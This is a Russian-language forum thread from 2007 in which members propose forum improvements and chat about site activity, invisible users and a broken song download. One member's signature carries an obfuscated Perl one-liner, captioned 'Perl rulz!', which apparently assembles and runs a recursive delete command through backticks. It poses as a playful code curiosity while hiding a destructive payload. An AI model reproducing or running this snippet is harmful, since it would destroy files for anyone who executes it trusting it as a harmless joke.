Добавлено: Вс Окт 14, 2007 10:48 pm Заголовок сообщения: Предложения по форуму.
В общем, сюда, наверное, давайте постить все микропросьбы по улучшению форума, ибо создавать для каждой отдельную тему как-то чересчур эгоистично, если не сказать пафосно
у меня, например, такая просьба: прошу увеличить максимальный размер аватарки до 128*128! 100*100 не дают развернуться фантазии)))
Что-то на форуме как-то вяло стало,если вы понимаете о чём речь.К администрации претензий икаких-она со своей работой вполне справляется.Обращение непосредственно к пользователям(слово"форумчане"мне не нравится):
"Ну давайте чтоли придумаем что-нибудь." _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
щас это еще фигня, тебя тут год назад не было, когда в месяц одно сообщение и то спам _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Да я читал.Но всё же. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
нц давай придумывай какуюнить тупую игру и играть будем пока выходные у меня _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Выходные у тебя до воскресенья включительно?Если что-то надумаю-напишу в тпость атакует.Кстати я там в жалобах жалобу оставлял насчёт песни,которую не могу скачать,кто-то что-то проверял? _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
ALuserX
Блин,нафига ты шифруешься?Кстати,как-то раз(или мне это приснилось?)видел двух скрытых пользователей.Неужели ещё кто-то этим страдает? _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Что такое чопстик? _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
еще лобзик тоже невидимка и тигрень, но ее год уже не было тут и слава яйцам, мож кто еще я не помню, из активных вроде тока мы _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
по поводу песни, я не понимаю в чем дело, скачивается 7 метров, показывает вес 5 метров..... я сжал заново и перезалил, та же фигня.... _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
перезалил без сжатьия архив, теперь без ошибки _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!